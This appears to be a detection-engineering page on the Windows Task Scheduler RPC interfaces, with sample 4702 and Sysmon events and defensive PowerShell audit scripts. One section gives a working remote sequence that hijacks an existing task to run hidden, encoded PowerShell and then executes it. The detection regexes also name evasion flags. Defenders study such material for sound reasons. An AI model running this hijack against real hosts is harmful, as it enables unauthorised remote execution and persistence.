# Task Scheduler Service
The Task Scheduler service allows you to perform automated tasks on a chosen computer. With this service, you can schedule any program to run at a convenient time for you or when a specific event occurs.
## Task Scheduler Service Remote Protocol
## ITaskSchedulerService RPC Server
The ITaskSchedulerService interface uses the **ncacn_ip_tcp** RPC protocol sequence and RPC dynamic endpoints.
### RPC Server
* **Name**: ITaskSchedulerService
* **UUID**: 86d35949-83c9-4044-b424-db363231fd0c
* **FilePath**: C:\Windows\System32\schedsvc.dll
```
InterfaceId : 86d35949-83c9-4044-b424-db363231fd0c
InterfaceVersion : 1.0
TransferSyntaxId : 8a885d04-1ceb-11c9-9fe8-08002b104860
TransferSyntaxVersion : 2.0
ProcedureCount : 20
Procedures : {SchRpcHighestVersion, SchRpcRegisterTask, SchRpcRetrieveTask, SchRpcCreateFolder...}
Server : UUID: 86d35949-83c9-4044-b424-db363231fd0c
ComplexTypes : {Struct_0, Struct_1, Struct_3}
FilePath : C:\Windows\System32\schedsvc.dll
Name : schedsvc.dll
Offset : 510656
ServiceName : Schedule
ServiceDisplayName : Task Scheduler
IsServiceRunning : True
Endpoints : {[86d35949-83c9-4044-b424-db363231fd0c, 1.0] ncalrpc:[LRPC-4803de23b17986468a], [86d35949-83c9-4044-b424-db363231fd0c, 1.0] ncalrpc:[ubpmtaskhostchannel],
[86d35949-83c9-4044-b424-db363231fd0c, 1.0] ncalrpc:[LRPC-83a142d94b8e74a91a]}
EndpointCount : 3
Client : False
```
### RPC Clients
* taskcomp.dll
* taskschd.dll
* wmicmiplugin.dll
### RPC Methods
* SchRpcRegisterTask (Opnum 1) - The SchRpcRegisterTask method registers a task with the server; it is also the method used to update an existing task.
* SchRpcRetrieveTask (Opnum 2) - The SchRpcRetrieveTask method returns a task definition.
* SchRpcRun (Opnum 12) - The SchRpcRun method runs a task specified by a path.
## ATSvc RPC Server
When using the ATSvc interface, the Task Scheduler Remoting Protocol client and server MUST specify **ncacn_np** as the RPC protocol sequence.
The ATSvc interface uses a well-known endpoint **\PIPE\atsvc**.
### RPC Server
* **Name**: ATSvc
* **UUID**: 1ff70682-0a51-30e8-076d-740be8cee98b
* **FilePath**: C:\Windows\System32\taskcomp.dll
```
InterfaceId : 1ff70682-0a51-30e8-076d-740be8cee98b
InterfaceVersion : 1.0
TransferSyntaxId : 8a885d04-1ceb-11c9-9fe8-08002b104860
TransferSyntaxVersion : 2.0
ProcedureCount : 4
Procedures : {NetrJobAdd, NetrJobDel, NetrJobEnum, NetrJobGetInfo}
Server : UUID: 1ff70682-0a51-30e8-076d-740be8cee98b
ComplexTypes : {Struct_0, Struct_1, Struct_2}
FilePath : C:\Windows\System32\taskcomp.dll
Name : taskcomp.dll
Offset : 322256
ServiceName :
ServiceDisplayName :
IsServiceRunning : False
Endpoints : {[1ff70682-0a51-30e8-076d-740be8cee98b, 1.0] ncalrpc:[LRPC-b858137bbb082a0e8d]}
EndpointCount : 1
Client : False
```
### RPC Clients
* mstask.dll
* schedcli.dll
### RPC Methods
* NetrJobAdd (Opnum 0) - The NetrJobAdd method MUST add a single AT task to the server's task store.
* NetrJobDel (Opnum 1) - The NetrJobDel method MUST delete a specified range of tasks from the task store. The method is capable of deleting all AT tasks or just a subset of the tasks, as determined by the values of the MinJobId and MaxJobId parameters.
* NetrJobEnum (Opnum 2) - The NetrJobEnum method MUST return an enumeration of all AT tasks on the specified server.
* NetrJobGetInfo (Opnum 3) - The NetrJobGetInfo method MUST return information for a specified ATSvc task. The task identifier MUST be used to locate the task configuration.
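The two interface listings above are the output shape of `Get-RpcServer` from the NtObjectManager PowerShell module. The following script, added here as an example and not part of the original page, reproduces those listings for both DLLs and reports whether each interface currently has an endpoint registered, which is the quickest way to confirm what a given host actually exposes. It assumes NtObjectManager is installed (`Install-Module NtObjectManager`), that `Get-RpcServer` accepts the DLL path via `-FullPath`, and that each entry in `Procedures` carries `Name` and `ProcNum` properties; the property names on the returned server object (`InterfaceId`, `ProcedureCount`, `Endpoints`, `EndpointCount`) are the ones shown in the listings.

```powershell
# Added example (not part of the original page): reproduce the ITaskSchedulerService and
# ATSvc listings with NtObjectManager and check which interfaces have live endpoints.
# Assumes NtObjectManager is installed and that symbol loading works (it warns otherwise).
Import-Module NtObjectManager

# Interface UUIDs and the DLLs that implement them, taken from the listings above.
$interfaces = @{
    '86d35949-83c9-4044-b424-db363231fd0c' = 'C:\Windows\System32\schedsvc.dll'   # ITaskSchedulerService
    '1ff70682-0a51-30e8-076d-740be8cee98b' = 'C:\Windows\System32\taskcomp.dll'   # ATSvc
}

foreach ($entry in $interfaces.GetEnumerator()) {
    # Parse every RPC interface compiled into the DLL and keep the one we are after.
    $server = Get-RpcServer -FullPath $entry.Value |
        Where-Object { "$($_.InterfaceId)" -eq $entry.Key }
    if (-not $server) {
        Write-Warning "Interface $($entry.Key) not found in $($entry.Value)"
        continue
    }

    [pscustomobject]@{
        Interface      = $entry.Key
        File           = $entry.Value
        Service        = $server.ServiceName
        ProcedureCount = $server.ProcedureCount
        # Assumed property names on the procedure objects: Name and ProcNum (the opnum).
        Procedures     = ($server.Procedures | ForEach-Object { "$($_.Name) (opnum $($_.ProcNum))" }) -join ', '
        # Endpoints are only present while the hosting service has the interface registered.
        Endpoints      = ($server.Endpoints | ForEach-Object { $_.ToString() }) -join '; '
        Listening      = $server.EndpointCount -gt 0
    }
}
```

Run it elevated on the host being reviewed. For ATSvc the listing above already shows `IsServiceRunning : False` and a single LRPC endpoint, so `Listening` distinguishes an interface that merely exists in a DLL from one a client could reach.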
## Task Actions
* ComHandler Action - This action fires a COM handler.
* Exec Action - This action executes a command-line operation such as starting Notepad.
* E-mail Action - This action sends an email when a task is triggered.
* Show Message Action - This action shows a message box with a specified message and title.
## Task Triggers
* TASK_TRIGGER_EVENT - 0 - Starts the task when a specific event occurs.
* TASK_TRIGGER_TIME - 1 - Starts the task at a specific time of day.
* TASK_TRIGGER_DAILY - 2 - Starts the task daily.
* TASK_TRIGGER_WEEKLY - 3 - Starts the task weekly.
* TASK_TRIGGER_MONTHLY - 4 - Starts the task monthly.
* TASK_TRIGGER_MONTHLYDOW - 5 - Starts the task every month on a specific day of the week.
* TASK_TRIGGER_IDLE - 6 - Starts the task when the computer goes into an idle state.
* TASK_TRIGGER_REGISTRATION - 7 - Starts the task when the task is registered.
* TASK_TRIGGER_BOOT - 8 - Starts the task when the computer boots.
* TASK_TRIGGER_LOGON - 9 - Starts the task when a specific user logs on.
* TASK_TRIGGER_SESSION_STATE_CHANGE - 11 - Triggers the task when a specific session state changes.
## Interact with Task Scheduler Remotely
### PowerShell - Schedule.Service COM Object
```powershell
# Connect to the Task Scheduler service on the target host:
$service = New-Object -ComObject Schedule.Service
$service.Connect("WORKSTATION6")
# Get the task folder that contains the tasks of interest:
$folder = $service.GetFolder('\Microsoft\Windows\')
# Example: the root task container:
$folder = $service.GetFolder('\')
# Enumerate a specific task, or every task in the folder (0 = visible tasks only):
$ward0gtask = $folder.GetTask('Ward0g')
$alltasks = $folder.GetTasks(0)
# Get the task definition and change it (here the action path and arguments):
$taskdefinition = $ward0gtask.Definition
$taskdefinition.Actions | ForEach-Object { $_.Path = "powershell" }
$taskdefinition.Actions | ForEach-Object { $_.Arguments = "-noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAUwBpAE8ATgBUAGEAQgBMAGUALgBQAFMAVgBlAHIAUwBpAE8AbgAuAE0AY...." }
# Write the changed task definition back:
# 4 = TASK_UPDATE
$folder.RegisterTaskDefinition($ward0gtask.Name, $taskdefinition, 4, $null, $null, $null)
# Execute the task:
$NewTask = $folder.GetTask("Ward0g")
$NewTask.Run($null)
# Stop the task:
$NewTask.Stop(0)
```
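The same COM interface that updates a task can be used to audit every task a host will run, which is the check a defender wants after reading the trigger table and the modification sequence above. The script below is an added example, not code from the original page: it walks every task folder recursively (including hidden tasks), keeps only Exec actions, labels each trigger with the TASK_TRIGGER_TYPE2 names listed earlier, and reports tasks whose command line carries an encoded command, a hidden window or a bypassed execution policy. The regular expression and the choice of fields are assumptions for this example; `$ComputerName` defaults to the local machine.

```powershell
# Added example (not part of the original page): inventory scheduled tasks through the
# Schedule.Service COM object and flag Exec actions that look like encoded PowerShell.
# Pass -ComputerName to inspect a remote host (needs admin rights there, as Connect() does above).
param(
    [string]$ComputerName = $env:COMPUTERNAME
)

# Trigger type names keyed by the numeric TASK_TRIGGER_TYPE2 values from the trigger table.
$TriggerTypes = @{
    0 = 'EVENT'; 1 = 'TIME'; 2 = 'DAILY'; 3 = 'WEEKLY'; 4 = 'MONTHLY'
    5 = 'MONTHLYDOW'; 6 = 'IDLE'; 7 = 'REGISTRATION'; 8 = 'BOOT'; 9 = 'LOGON'
    11 = 'SESSION_STATE_CHANGE'
}
$TASK_ACTION_EXEC = 0   # IAction.Type value for an Exec action
$TASK_ENUM_HIDDEN = 1   # GetTasks() flag: include tasks marked hidden

# Heuristic (assumed for this example): encoded command blob, hidden window, bypassed policy,
# or no profile, the switches seen in the modified task above.
$SuspiciousArgs = '(?i)(-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}|-w(indowstyle)?\s+(1|hidden)|-ep\s+bypass|-no(p|profile)\b)'

function Get-TaskFolderRecursive {
    param($Folder)
    $Folder
    foreach ($sub in $Folder.GetFolders(0)) { Get-TaskFolderRecursive -Folder $sub }
}

$service = New-Object -ComObject Schedule.Service
$service.Connect($ComputerName)

$findings = foreach ($folder in Get-TaskFolderRecursive -Folder $service.GetFolder('\')) {
    foreach ($task in $folder.GetTasks($TASK_ENUM_HIDDEN)) {
        $def = $task.Definition
        foreach ($action in $def.Actions) {
            if ($action.Type -ne $TASK_ACTION_EXEC) { continue }
            $cmd = "$($action.Path) $($action.Arguments)".Trim()
            if ($cmd -notmatch $SuspiciousArgs) { continue }
            [pscustomobject]@{
                Task     = $task.Path
                Author   = $def.RegistrationInfo.Author
                Modified = $def.RegistrationInfo.Date
                RunAs    = $def.Principal.UserId
                RunLevel = $def.Principal.RunLevel        # 1 = TASK_RUNLEVEL_HIGHEST
                Triggers = ($def.Triggers | ForEach-Object {
                               $name = $TriggerTypes[[int]$_.Type]
                               if ($name) { $name } else { "TYPE$($_.Type)" }
                           }) -join ','
                Command  = $cmd
            }
        }
    }
}

$findings | Format-List
```

Drop the `-notmatch` line to get a full inventory instead of only the flagged tasks; the `RegistrationInfo.Date` and `Author` fields are what the 4702 event below records as the task's registration data, so they are the values to compare against when the event and the live task disagree.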
## Security Event Logs
### Security Log
* EventID 4624: Successful Logon
* EventID 4702 (Target): A scheduled task was updated
```xml
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" />
    <EventID>4702</EventID>
    <Version>1</Version>
    <Level>0</Level>
    <Task>12804</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <EventRecordID>2292968</EventRecordID>
    <Channel>Security</Channel>
    <Computer>WORKSTATION6.theshire.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-21-3786818125-2382361537-3207726629-1104</Data>
    <Data Name="SubjectUserName">pgustavo</Data>
    <Data Name="SubjectDomainName">THESHIRE</Data>
    <Data Name="SubjectLogonId">0x9ac216f</Data>
    <Data Name="TaskName">\Ward0g</Data>
    <!-- TaskContentNew holds the new task definition XML; only its text values are shown here -->
    <Data Name="TaskContentNew">2020-12-16T08:09:21.4521839 THESHIRE\sbeavers Que pasa \Ward0g true S-1-5-21-3786818125-2382361537-3207726629-1106 InteractiveToken LeastPrivilege IgnoreNew true true true false false true false true true false false false PT72H 7 powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAUwBpAE8ATgBUAGEAQgBMAGUALgBQAFMAVgBlAHIAUwBwAt.....</Data>
    <Data Name="ClientProcessStartKey">0</Data>
    <Data Name="ClientProcessId">0</Data>
    <Data Name="ParentProcessId">0</Data>
    <Data Name="RpcCallClientLocality">0</Data>
    <Data Name="FQDN">WORKSTATION6.theshire.local</Data>
  </EventData>
</Event>
```
* EventID 4688 (Target): A new process has been created
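The useful part of a 4702 event is the task definition carried in `TaskContentNew` (the created-task event, 4698, carries it as `TaskContent`), because that is where the new Exec command lives. The script below is an added example, not code from the original page: it reads 4698/4702 events from the live Security log or from an exported `.evtx` file, unpacks the event data into a hashtable, parses the embedded task XML with its `http://schemas.microsoft.com/windows/2004/02/mit/task` namespace, and reports who registered the task, what it runs and as whom. The `-Path` parameter, the output fields and the regular expression are assumptions for this example.

```powershell
# Added example (not part of the original page): parse task creation (4698) and update (4702)
# events from the Security log and surface the Exec action each task definition will run.
# -Path is optional; give it an exported .evtx file to analyse offline instead of the live log.
param(
    [string]$Path,
    [int]$MaxEvents = 500
)

$filter = @{ Id = 4698, 4702 }
if ($Path) { $filter.Path = $Path } else { $filter.LogName = 'Security' }

# Heuristic (assumed): encoded command blob, hidden window or bypassed execution policy.
$SuspiciousArgs = '(?i)(-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}|-w(indowstyle)?\s+(1|hidden)|-ep\s+bypass)'

function ConvertFrom-TaskEvent {
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event)

    # Event XML layout: <Event><System>...</System><EventData><Data Name="...">...</Data></EventData></Event>
    $x = [xml]$Event.ToXml()
    $data = @{}
    foreach ($d in $x.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

    # 4702 carries TaskContentNew, 4698 carries TaskContent; both are the task definition XML.
    $content = if ($Event.Id -eq 4702) { $data['TaskContentNew'] } else { $data['TaskContent'] }
    if (-not $content) { return }
    $task = [xml]$content
    $ns = New-Object System.Xml.XmlNamespaceManager($task.NameTable)
    $ns.AddNamespace('t', 'http://schemas.microsoft.com/windows/2004/02/mit/task')

    $exec = $task.SelectSingleNode('//t:Actions/t:Exec', $ns)
    $cmd  = if ($exec) { "$($exec.Command) $($exec.Arguments)".Trim() } else { '' }

    [pscustomobject]@{
        Time       = $Event.TimeCreated
        EventId    = $Event.Id
        Computer   = $Event.MachineName
        Subject    = "$($data['SubjectDomainName'])\$($data['SubjectUserName'])"
        TaskName   = $data['TaskName']
        Author     = $task.SelectSingleNode('//t:RegistrationInfo/t:Author', $ns).InnerText
        RunAs      = $task.SelectSingleNode('//t:Principals/t:Principal/t:UserId', $ns).InnerText
        RunLevel   = $task.SelectSingleNode('//t:Principals/t:Principal/t:RunLevel', $ns).InnerText
        Command    = $cmd
        Suspicious = [bool]($cmd -match $SuspiciousArgs)
    }
}

Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
    ForEach-Object { ConvertFrom-TaskEvent -Event $_ } |
    Where-Object { $_.Suspicious } |
    Format-List
```

Note the two identities in a 4702 event: `Subject*` is the account that performed the update (pgustavo in the event above, via RPC) while the `UserId` inside the task XML is the account the task runs as (sbeavers above); a mismatch between the two is worth a look on its own, independent of the command line.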
### Microsoft-Windows-TaskScheduler/Operational Logs
* EventID 140: Task Registration Updated
* EventID 100: Task Started
* EventID 201: Action Completed
* EventID 201: Task Completed
* EventID 111: Task Terminated
* EventID 332: Launch request ignored. Instance already running
## Sysmon
* EventID 1: ProcessCreate (When Task is stopped)
```xml
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Sysmon" />
    <EventID>1</EventID>
    <Version>5</Version>
    <Level>4</Level>
    <Task>1</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8000000000000000</Keywords>
    <EventRecordID>9090341</EventRecordID>
    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
    <Computer>WORKSTATION6.theshire.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="RuleName">-</Data>
    <Data Name="UtcTime">2020-12-16 17:23:48.185</Data>
    <Data Name="ProcessGuid">{649442b8-42a4-5fda-af62-000000000600}</Data>
    <Data Name="ProcessId">2836</Data>
    <Data Name="Image">C:\Windows\System32\taskhostw.exe</Data>
    <Data Name="FileVersion">10.0.18362.1237 (WinBuild.160101.0800)</Data>
    <Data Name="Description">Host Process for Windows Tasks</Data>
    <Data Name="Product">Microsoft® Windows® Operating System</Data>
    <Data Name="Company">Microsoft Corporation</Data>
    <Data Name="OriginalFileName">taskhostw.exe</Data>
    <Data Name="CommandLine">taskhostw.exe C:\windows\System32\WindowsPowerShell\v1.0\powershell.EXE -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAUwBpAE8ATgBUAGEAQgBMAGUALgBQAFMAVgBlAHIAUwBpAE8AbgAuAE0AYQBqAE8AcgAgAC0AZwBFACAAMwApAHsAJAA4...</Data>
    <Data Name="CurrentDirectory">C:\windows\system32\</Data>
    <Data Name="User">THESHIRE\sbeavers</Data>
    <Data Name="LogonGuid">{649442b8-783d-5fd2-c316-e00000000000}</Data>
    <Data Name="LogonId">0xe016c3</Data>
    <Data Name="TerminalSessionId">2</Data>
    <Data Name="IntegrityLevel">Medium</Data>
    <Data Name="Hashes">SHA1=6630F5E1A1ACC1C8E95A7958542DD87D0735D99B,MD5=52071D9553A92A12F22DDDF6DB6F9643,SHA256=ABCA3394728697205DEAD7C9B7B9076CDD28BEE84E7A3C84514478BC033E531A,IMPHASH=9CB27CAED52CB0AFFB32788922A0D083</Data>
    <Data Name="ParentProcessGuid">{649442b8-52dc-5fd1-3600-000000000600}</Data>
    <Data Name="ParentProcessId">2220</Data>
    <Data Name="ParentImage">C:\Windows\System32\svchost.exe</Data>
    <Data Name="ParentCommandLine">C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule</Data>
  </EventData>
</Event>
```
* EventID 1: ProcessCreate (Execution when task is forced to execute or task is updated)
```xml
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Sysmon" />
    <EventID>1</EventID>
    <Version>5</Version>
    <Level>4</Level>
    <Task>1</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8000000000000000</Keywords>
    <EventRecordID>9103725</EventRecordID>
    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
    <Computer>WORKSTATION6.theshire.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="RuleName">-</Data>
    <Data Name="UtcTime">2020-12-16 17:40:05.997</Data>
    <Data Name="ProcessGuid">{649442b8-4675-5fda-d962-000000000600}</Data>
    <Data Name="ProcessId">6840</Data>
    <Data Name="Image">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
    <Data Name="FileVersion">10.0.18362.1 (WinBuild.160101.0800)</Data>
    <Data Name="Description">Windows PowerShell</Data>
    <Data Name="Product">Microsoft® Windows® Operating System</Data>
    <Data Name="Company">Microsoft Corporation</Data>
    <Data Name="OriginalFileName">PowerShell.EXE</Data>
    <Data Name="CommandLine">C:\windows\System32\WindowsPowerShell\v1.0\powershell.EXE -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAUwBpAE8ATgBUAGEAQgBMAGUALgBQAFMAVgBlAHIAUwBpAE8AbgAuAE0AYQBqAE8AcgAgAC0AZwBFACAAMwAp...</Data>
    <Data Name="CurrentDirectory">C:\windows\system32\</Data>
    <Data Name="User">THESHIRE\sbeavers</Data>
    <Data Name="LogonGuid">{649442b8-783d-5fd2-c316-e00000000000}</Data>
    <Data Name="LogonId">0xe016c3</Data>
    <Data Name="TerminalSessionId">2</Data>
    <Data Name="IntegrityLevel">Medium</Data>
    <Data Name="Hashes">SHA1=36C5D12033B2EAF251BAE61C00690FFB17FDDC87,MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481</Data>
    <Data Name="ParentProcessGuid">{649442b8-52dc-5fd1-3600-000000000600}</Data>
    <Data Name="ParentProcessId">2220</Data>
    <Data Name="ParentImage">C:\Windows\System32\svchost.exe</Data>
    <Data Name="ParentCommandLine">C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule</Data>
  </EventData>
</Event>
```
* EventID 7: Image Loaded (the client DLLs listed under each RPC server above)
  * taskcomp.dll
  * taskschd.dll
  * wmicmiplugin.dll
  * mstask.dll
  * schedcli.dll
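Both Sysmon events above share the same parent, `svchost.exe -k netsvcs -p -s Schedule`, which is the stable anchor for detecting task-launched processes: the Schedule service host (or `taskhostw.exe`, which it starts) should only spawn a small, predictable set of children. The script below is an added example, not code from the original page or from Sysmon. It selects Sysmon Event ID 1 records whose parent is the Schedule service host or `taskhostw.exe`, flags children that are not on an expected-image list or that carry an encoded command, and attributes each one to a task name by pairing it with the nearest `Task Started` (EventID 100) record from the TaskScheduler/Operational log. The expected-child list, the time window, the `.evtx` path parameters and the field names `TaskName` and `UserContext` on event 100 are assumptions for this example.

```powershell
# Added example (not part of the original page): processes spawned by the Task Scheduler
# service host (Sysmon Event ID 1, parent "svchost.exe ... -s Schedule" or taskhostw.exe),
# attributed to a task via the nearest TaskScheduler/Operational "Task Started" (100) event.
# -SysmonPath / -OperationalPath are optional exported .evtx files for offline analysis.
param(
    [string]$SysmonPath,
    [string]$OperationalPath,
    [int]$WindowSeconds = 5
)

function Get-EventData {
    # Flatten <EventData><Data Name="x">v</Data>... into a hashtable keyed by Name.
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    $x = [xml]$Event.ToXml()
    $data = @{}
    foreach ($d in $x.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    $data
}

$sysmonFilter = @{ Id = 1 }
if ($SysmonPath) { $sysmonFilter.Path = $SysmonPath } else { $sysmonFilter.LogName = 'Microsoft-Windows-Sysmon/Operational' }
$opFilter = @{ Id = 100 }
if ($OperationalPath) { $opFilter.Path = $OperationalPath } else { $opFilter.LogName = 'Microsoft-Windows-TaskScheduler/Operational' }

# "Task Started" events kept as (time, task name, user) for the join below.
# Assumed event-100 data fields: TaskName and UserContext.
$started = Get-WinEvent -FilterHashtable $opFilter -ErrorAction SilentlyContinue | ForEach-Object {
    $d = Get-EventData -Event $_
    [pscustomobject]@{ Time = $_.TimeCreated; TaskName = $d['TaskName']; User = $d['UserContext'] }
}

# Children the Schedule service launches as part of its own operation (assumed list).
$ExpectedChildren = @('taskhostw.exe', 'conhost.exe')
# Parent is the Schedule service host, or taskhostw.exe started by it.
$ScheduleParent = '(?i)(svchost\.exe\s.*-s\s+Schedule\b|\\taskhostw\.exe$)'
# Encoded-command switch followed by a base64-looking blob (heuristic, assumed).
$EncodedCommand = '(?i)-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}'

Get-WinEvent -FilterHashtable $sysmonFilter -ErrorAction SilentlyContinue | ForEach-Object {
    $d = Get-EventData -Event $_
    $parent = "$($d['ParentCommandLine']) $($d['ParentImage'])"
    if ($parent -notmatch $ScheduleParent) { return }

    $imageName = Split-Path -Leaf $d['Image']
    $t = $_.TimeCreated
    # Nearest Task Started event within the window, if the Operational log has one.
    $match = $started |
        Where-Object { [math]::Abs(($_.Time - $t).TotalSeconds) -le $WindowSeconds } |
        Sort-Object -Property { [math]::Abs(($_.Time - $t).TotalSeconds) } |
        Select-Object -First 1

    [pscustomobject]@{
        Time             = $t
        Computer         = $_.MachineName
        User             = $d['User']
        Image            = $d['Image']
        CommandLine      = $d['CommandLine']
        ParentImage      = $d['ParentImage']
        LikelyTask       = if ($match) { $match.TaskName } else { '(no Task Started event within window)' }
        NonStandardChild = $ExpectedChildren -notcontains $imageName
        EncodedCommand   = [bool]($d['CommandLine'] -match $EncodedCommand)
    }
} | Where-Object { $_.NonStandardChild -or $_.EncodedCommand } | Format-List
```

On the events above this yields two hits: `taskhostw.exe` passes the expected-child check but is caught by its encoded command line, and `powershell.exe` is caught by both. The TaskScheduler/Operational log is not enabled everywhere, so `LikelyTask` falls back to a placeholder rather than dropping the Sysmon record.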
## References
* https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-TSCH/%5BMS-TSCH%5D-170915-diff.pdf
* https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/eb12c947-7e20-4a30-a528-85bc433cec44
* https://docs.microsoft.com/en-us/windows/win32/taskschd/displaying-task-names-and-state--scripting-
* https://docs.microsoft.com/en-us/windows/win32/taskschd/trigger-type
* https://docs.microsoft.com/en-us/windows/win32/taskschd/tasksettings
* https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/fbab083e-f79f-4216-af4c-d5104a913d40
* https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/4d44c426-fad2-4cc7-9677-bfcd235dca33